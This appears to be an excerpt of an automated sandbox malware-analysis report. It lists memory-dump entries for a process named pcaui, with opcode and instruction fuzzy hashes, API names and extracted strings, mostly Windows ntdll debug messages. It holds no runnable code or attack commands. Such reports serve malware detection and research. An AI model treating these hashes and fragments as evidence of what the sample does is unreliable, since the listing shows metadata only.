                                                                                                                        • Instruction Fuzzy Hash: 05B09B729415C5C6FA51E760960CF1F79517BD1711F55C065D2030685F4738C1D1E276
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                                                        • Instruction ID: 3e05f51be1c8c9fa5b8e6b3f2bf5b7ecf7f16f12566ab35852cadba1c27010a6
                                                                                                                        • Opcode Fuzzy Hash: 9d8d57cf1da3adc5be78d5bbf9d06d32d62fd4e96017ce3f93e6d72d8de9ab0d
                                                                                                                        • Instruction Fuzzy Hash: C141E7B161CB0D8FDB6CEF699085677B3E2FB85300F50052DD98AC3252EBB4E8468785
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                        • API String ID: 0-3558027158
                                                                                                                        • Opcode ID: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                                                        • Instruction ID: 63c681cd2b7fb3020b83b6d4e7794f455120e5f9940c2597ac15e18a7c1c5fb8
                                                                                                                        • Opcode Fuzzy Hash: e4eec1d762e51e22950394cb580eb97dba334b39a4181834493c555fc7b4da90
                                                                                                                        • Instruction Fuzzy Hash: 3F9160F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 3cd3d6b49aadb47895412e6729f9ca8efdf4c7e64f2ca279d2d545be18d1e97c
                                                                                                                        • Instruction ID: d2d5f634814da50058be9816cdb4008c61f75f0f2744912db03ff1578c14fc95
                                                                                                                        • Opcode Fuzzy Hash: 3cd3d6b49aadb47895412e6729f9ca8efdf4c7e64f2ca279d2d545be18d1e97c
                                                                                                                        • Instruction Fuzzy Hash: EE51E9BAB04117BFDF11DBA8D89497EF7F9BB09200B509269E495D7681D334DE408BE0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: fbf6bb772298cf0becb110154c595c197d137d61f8db30fc59fbd78621f837bd
                                                                                                                        • Instruction ID: 5284e9fcd33cf0be042425db2a7ceaf10e59e0aae424574540acc4394a2232ef
                                                                                                                        • Opcode Fuzzy Hash: fbf6bb772298cf0becb110154c595c197d137d61f8db30fc59fbd78621f837bd
                                                                                                                        • Instruction Fuzzy Hash: 1A510379F0064AAFCB30DE9CD8909BFB7FAFB44200B048459E8D6D3641E774EA408B64
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05034655
                                                                                                                        • ExecuteOptions, xrefs: 050346A0
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 05034787
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05034742
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050346FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05034725
                                                                                                                        • Execute=1, xrefs: 05034713
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: b98a234c31be481c3cc471cca4819e57ac0021764a343af5fc451f10fd9e19f9
                                                                                                                        • Instruction ID: 120b18654042bd803d9c43f364fe0e4a1524ef605f72d7de6a1a4497cb05c4f5
                                                                                                                        • Opcode Fuzzy Hash: b98a234c31be481c3cc471cca4819e57ac0021764a343af5fc451f10fd9e19f9
                                                                                                                        • Instruction Fuzzy Hash: 9651CB71B002196BEF10BF64ED89FEDB7E8AF14704F1400A9D605A71A0EB71BA56CF54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: c6288662990fcfc7c936cff83c85cd0c0294892787ccec33ae82d91edc33f36a
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: 06021471608341AFDB49CF18D494A6EBBE5FFC8700F14892DF9954B268DB32E905DB82
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 6eae13af6e311f5717acc1f0f8845e141dcde98980aab7be4ee166ba9a3f6c01
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: F281D330E092499EFF68CE68E9507FEBBF2BF45310F186559D8A6A72D0C7348941CB51
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: 02674f1c41d1517b54048a1df722bc4b212f521d31c131aa425b1e3977191671
                                                                                                                        • Instruction ID: 82e4e106cacf83bfdaa5d576ab72ab1824521a99329a55c9599faf68e9a6b084
                                                                                                                        • Opcode Fuzzy Hash: 02674f1c41d1517b54048a1df722bc4b212f521d31c131aa425b1e3977191671
                                                                                                                        • Instruction Fuzzy Hash: 6E21717AE0015EABDB10DE79EC54AFE77E9BF64640F080116ED45D3240EB30EA418BA5
                                                                                                                        Strings
                                                                                                                        • RTL: Re-Waiting, xrefs: 0503031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050302E7
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050302BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 05037B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 05037BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05037B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0503728C
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 050372A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 050372C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05037294
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0504CFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F90000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.00000000050BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_4f90000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Cw@4Cw
                                                                                                                        • API String ID: 4062629308-3101775584
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.3973992378.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_5390000_pcaui.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 95qp$p$ro|e$syta
                                                                                                                        • API String ID: 0-2460837372